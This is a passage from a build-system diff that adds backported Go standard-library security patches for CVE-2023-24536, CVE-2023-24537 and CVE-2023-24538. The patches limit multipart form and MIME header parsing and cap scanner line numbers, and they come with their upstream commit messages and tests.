+ src/mime/multipart/formdata.go | 15 +++++++--
+ src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+), 3 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index a7d4ca97f0484..975dcb6b26db4 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ maxMemoryBytes = math.MaxInt64
+ }
+ }
++ var copyBuf []byte
+ for {
+ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ }
+ numDiskFiles++
+- size, err := io.Copy(file, io.MultiReader(&b, p))
++ if _, err := file.Write(b.Bytes()); err != nil {
++ return nil, err
++ }
++ if copyBuf == nil {
++ copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
++ }
++ // os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
++ type writerOnly struct{ io.Writer }
++ remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
+ if err != nil {
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+- fh.Size = size
++ fh.Size = int64(b.Len()) + remainingSize
+ fh.tmpoff = fileOff
+- fileOff += size
++ fileOff += fh.Size
+ if !combineFiles {
+ if err := file.Close(); err != nil {
+ return nil, err
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 5cded7170c6b8..f5b56083b2377 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ t.Fatalf("temp dir contains %v files; want 0", len(names))
+ }
+ }
++
++func BenchmarkReadForm(b *testing.B) {
++ for _, test := range []struct {
++ name string
++ form func(fw *Writer, count int)
++ }{{
++ name: "fields",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }, {
++ name: "files",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }} {
++ b.Run(test.name, func(b *testing.B) {
++ for _, maxMemory := range []int64{
++ 0,
++ 1 << 20,
++ } {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.form(fw, 10)
++ if err := fw.Close(); err != nil {
++ b.Fatal(err)
++ }
++ b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
++ b.ReportAllocs()
++ for i := 0; i < b.N; i++ {
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(maxMemory)
++ if err != nil {
++ b.Fatal(err)
++ }
++ form.RemoveAll()
++ }
++
++ })
++ }
++ })
++ }
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
+From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 16:56:12 -0700
+Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
+ improve accounting of non-file data
+
+For requests containing large numbers of small parts,
+memory consumption of a parsed form could be about 250%
+over the estimated size.
+
+When considering the size of parsed forms, account for the size of
+FileHeader structs and increase the estimate of memory consumed by
+map entries.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 9 +++--
+ src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
+ src/net/textproto/reader.go | 8 ++++-
+ 3 files changed, 37 insertions(+), 35 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 975dcb6b26db4..3f6ff697ca608 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Multiple values for the same key (one map entry, longer slice) are cheaper
+ // than the same number of values for different keys (many map entries), but
+ // using a consistent per-value cost for overhead is simpler.
++ const mapEntryOverhead = 200
+ maxMemoryBytes -= int64(len(name))
+- maxMemoryBytes -= 100 // map overhead
++ maxMemoryBytes -= mapEntryOverhead
+ if maxMemoryBytes < 0 {
+ // We can't actually take this path, since nextPart would already have
+ // rejected the MIME headers for being too large. Check anyway.
+@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ const fileHeaderSize = 100
+ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ maxMemoryBytes -= mapEntryOverhead
++ maxMemoryBytes -= fileHeaderSize
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ size = 400
+ for k, vs := range h {
+ size += int64(len(k))
+- size += 100 // map entry overhead
++ size += 200 // map entry overhead
+ for _, v := range vs {
+ size += int64(len(v))
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index f5b56083b2377..8ed26e0c34081 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
+ // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
+ // while processing non-file form data as well as file form data.
+ func TestReadForm_NonFileMaxMemory(t *testing.T) {
+- n := 10<<20 + 25
+ if testing.Short() {
+- n = 10<<10 + 25
++ t.Skip("skipping in -short mode")
+ }
++ n := 10 << 20
+ largeTextValue := strings.Repeat("1", n)
+ message := `--MyBoundary
+ Content-Disposition: form-data; name="largetext"
+@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
+ ` + largeTextValue + `
+ --MyBoundary--
+ `
+-
+ testBody := strings.ReplaceAll(message, "\n", "\r\n")
+- testCases := []struct {
+- name string
+- maxMemory int64
+- err error
+- }{
+- {"smaller", 50 + int64(len("largetext")) + 100, nil},
+- {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+- {"too-large", 0, ErrMessageTooLarge},
+- }
+- for _, tc := range testCases {
+- t.Run(tc.name, func(t *testing.T) {
+- if tc.maxMemory == 0 && testing.Short() {
+- t.Skip("skipping in -short mode")
+- }
+- b := strings.NewReader(testBody)
+- r := NewReader(b, boundary)
+- f, err := r.ReadForm(tc.maxMemory)
+- if err == nil {
+- defer f.RemoveAll()
+- }
+- if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+- }
+- if err == nil {
+- if g := f.Value["largetext"][0]; g != largeTextValue {
+- t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
+- }
+- }
+- })
++ // Try parsing the form with increasing maxMemory values.
++ // Changes in how we account for non-file form data may cause the exact point
++ // where we change from rejecting the form as too large to accepting it to vary,
++ // but we should see both successes and failures.
++ const failWhenMaxMemoryLessThan = 128
++ for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
++ b := strings.NewReader(testBody)
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(maxMemory)
++ if err != nil {
++ continue
++ }
++ if g := f.Value["largetext"][0]; g != largeTextValue {
++ t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
++ }
++ f.RemoveAll()
++ if maxMemory < failWhenMaxMemoryLessThan {
++ t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
++ }
++ return
+ }
++ t.Errorf("ReadForm(x) failed for x < 1024, expect success")
+ }
+
+ // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 9a21777df8be0..c1284fde25eb7 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ m := make(MIMEHeader, hint)
+
++ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
++ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
++ // MIMEHeaders average about 200 bytes per entry.
++ lim -= 400
++ const mapEntryOverhead = 200
++
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+ line, err := r.readLineSlice()
+@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ vv := m[key]
+ if vv == nil {
+ lim -= int64(len(key))
+- lim -= 100 // map entry overhead
++ lim -= mapEntryOverhead
+ }
+ lim -= int64(len(value))
+ if lim < 0 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
+From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
+
+The parsed forms of MIME headers and multipart forms can consume
+substantially more memory than the size of the input data.
+A malicious input containing a very large number of headers or
+form parts can cause excessively large memory allocations.
+
+Set limits on the size of MIME data:
+
+Reader.NextPart and Reader.NextRawPart limit the the number
+of headers in a part to 10000.
+
+Reader.ReadForm limits the total number of headers in all
+FileHeaders to 10000.
+
+Both of these limits may be set with with
+GODEBUG=multipartmaxheaders=<values>.
+
+Reader.ReadForm limits the number of parts in a form to 1000.
+This limit may be set with GODEBUG=multipartmaxparts=<value>.
+
+Thanks for Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 19 ++++++++-
+ src/mime/multipart/formdata_test.go | 61 ++++++++++++++++++++++++++++
+ src/mime/multipart/multipart.go | 31 ++++++++++----
+ src/mime/multipart/readmimeheader.go | 2 +-
+ src/net/textproto/reader.go | 19 +++++----
+ 5 files changed, 115 insertions(+), 17 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 216cccb..0b508ae 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -13,6 +13,7 @@ import (
+ "math"
+ "net/textproto"
+ "os"
++ "strconv"
+ )
+
+ // ErrMessageTooLarge is returned by ReadForm if the message form
+@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ numDiskFiles := 0
+ multipartFiles := godebug.Get("multipartfiles")
+ combineFiles := multipartFiles != "distinct"
++ maxParts := 1000
++ multipartMaxParts := godebug.Get("multipartmaxparts")
++ if multipartMaxParts != "" {
++ if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
++ maxParts = v
++ }
++ }
++ maxHeaders := maxMIMEHeaders()
++
+ defer func() {
+ if file != nil {
+ if cerr := file.Close(); err == nil {
+@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ var copyBuf []byte
+ for {
+- p, err := r.nextPart(false, maxMemoryBytes)
++ p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
+ if err == io.EOF {
+ break
+ }
+ if err != nil {
+ return nil, err
+ }
++ if maxParts <= 0 {
++ return nil, ErrMessageTooLarge
++ }
++ maxParts--
+
+ name := p.FormName()
+ if name == "" {
+@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
++ for _, v := range p.Header {
++ maxHeaders -= int64(len(v))
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 8ed26e0..c78eeb7 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ }
+ }
+
++func TestReadFormLimits(t *testing.T) {
++ for _, test := range []struct {
++ values int
++ files int
++ extraKeysPerFile int
++ wantErr error
++ godebug string
++ }{
++ {values: 1000},
++ {values: 1001, wantErr: ErrMessageTooLarge},
++ {values: 500, files: 500},
++ {values: 501, files: 500, wantErr: ErrMessageTooLarge},
++ {files: 1000},
++ {files: 1001, wantErr: ErrMessageTooLarge},
++ {files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
++ {files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxparts=100", values: 100},
++ {godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
++ } {
++ name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
++ if test.godebug != "" {
++ name += fmt.Sprintf("/godebug=%v", test.godebug)
++ }
++ t.Run(name, func(t *testing.T) {
++ if test.godebug != "" {
++ t.Setenv("GODEBUG", test.godebug)
++ }
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ for i := 0; i < test.values; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ for i := 0; i < test.files; i++ {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition",
++ fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
++ h.Set("Content-Type", "application/octet-stream")
++ for j := 0; j < test.extraKeysPerFile; j++ {
++ h.Set(fmt.Sprintf("k%v", j), "v")
++ }
++ w, _ := fw.CreatePart(h)
++ fmt.Fprintf(w, "value %v", i)
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(1 << 10)
++ if err == nil {
++ defer form.RemoveAll()
++ }
++ if err != test.wantErr {
++ t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
++ }
++ })
++ }
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 958cef8..94464a8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -16,11 +16,13 @@ import (
+ "bufio"
+ "bytes"
+ "fmt"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "mime"
+ "mime/quotedprintable"
+ "net/textproto"
++ "strconv"
+ "strings"
+ )
+
+@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := readMIMEHeader(r, maxMIMEHeaderSize)
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err == nil {
+ bp.Header = header
+ }
+@@ -306,6 +308,19 @@ type Reader struct {
+ // including header keys, values, and map overhead.
+ const maxMIMEHeaderSize = 10 << 20
+
++func maxMIMEHeaders() int64 {
++ // multipartMaxHeaders is the maximum number of header entries NextPart will return,
++ // as well as the maximum combined total of header entries Reader.ReadForm will return
++ // in FileHeaders.
++ multipartMaxHeaders := godebug.Get("multipartmaxheaders")
++ if multipartMaxHeaders != "" {
++ if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
++ return v
++ }
++ }
++ return 10000
++}
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false, maxMIMEHeaderSize)
++ return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true, maxMIMEHeaderSize)
++ return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+index 6836928..25aa6e2 100644
+--- a/src/mime/multipart/readmimeheader.go
++++ b/src/mime/multipart/readmimeheader.go
+@@ -11,4 +11,4 @@ import (
+ // readMIMEHeader is defined in package net/textproto.
+ //
+ //go:linkname readMIMEHeader net/textproto.readMIMEHeader
+-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
++func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 1c79f0a..ad2d777 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+- return readMIMEHeader(r, math.MaxInt64)
++ return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
+ }
+
+ // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
+ // It is called by the mime/multipart package.
+-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
++func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
+ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
+ // MIMEHeaders average about 200 bytes per entry.
+- lim -= 400
++ maxMemory -= 400
+ const mapEntryOverhead = 200
+
+ // The first line cannot start with a leading space.
+@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ continue
+ }
+
++ maxHeaders--
++ if maxHeaders < 0 {
++ return nil, errors.New("message too large")
++ }
++
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+ //
+ // value is computed as
+@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ vv := m[key]
+ if vv == nil {
+- lim -= int64(len(key))
+- lim -= mapEntryOverhead
++ maxMemory -= int64(len(key))
++ maxMemory -= mapEntryOverhead
+ }
+- lim -= int64(len(value))
+- if lim < 0 {
++ maxMemory -= int64(len(value))
++ if maxMemory < 0 {
+ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+ // to allow mime/multipart to detect it.
+ return m, errors.New("message too large")
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
+From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.20] mime/multipart: limit parsed mime
+ message sizes
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
+CVE: CVE-2023-24537
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/parser_test.go | 16 ++++++++++++++++
+ src/go/scanner/scanner.go | 5 ++++-
+ 2 files changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 37a6a2b..714557c 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
+ }
+ }
+ }
++
++// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
++func TestIssue59180(t *testing.T) {
++ testcases := []string{
++ "package p\n//line :9223372036854775806\n\n//",
++ "package p\n//line :1:9223372036854775806\n\n//",
++ "package p\n//line file:9223372036854775806\n\n//",
++ }
++
++ for _, src := range testcases {
++ _, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
++ if err == nil {
++ t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
++ }
++ }
++}
+diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
+index 00fe2dc..3159d25 100644
+--- a/src/go/scanner/scanner.go
++++ b/src/go/scanner/scanner.go
+@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
+ return
+ }
+
++ // Put a cap on the maximum size of line and column numbers.
++ // 30 bits allows for some additional space before wrapping an int32.
++ const maxLineCol = 1<<30 - 1
+ var line, col int
+ i2, n2, ok2 := trailingDigits(text[:i-1])
+ if ok2 {
+ //line filename:line:col
+ i, i2 = i2, i
+ line, col = n2, n
+- if col == 0 {
++ if col == 0 || col > maxLineCol {
+ s.error(offs+i2, "invalid column number: "+string(text[i2:]))
+ return
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
+From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
+From: Brad Fitzpatrick <bradfitz@golang.org>
+Date: Mon, 2 Aug 2021 14:55:51 -0700
+Subject: [PATCH 1/6] net/netip: add new IP address package
+
+Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
+Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
+Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
+Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
+Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
+Co-authored-by: Elias Naur <mail@eliasnaur.com>
+Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
+Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
+Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
+Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
+Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
+Co-authored-by: Matt Layher <mdlayher@gmail.com>
+Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
+Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
+Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
+Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
+
+Fixes #46518
+
+Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
+Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
+Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+Trust: Brad Fitzpatrick <bradfitz@golang.org>
+
+Dependency Patch #1
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/internal/godebug/godebug.go | 34 ++++++++++++++++++++++++++++++++++
+ src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+)
+ create mode 100644 src/internal/godebug/godebug.go
+ create mode 100644 src/internal/godebug/godebug_test.go
+
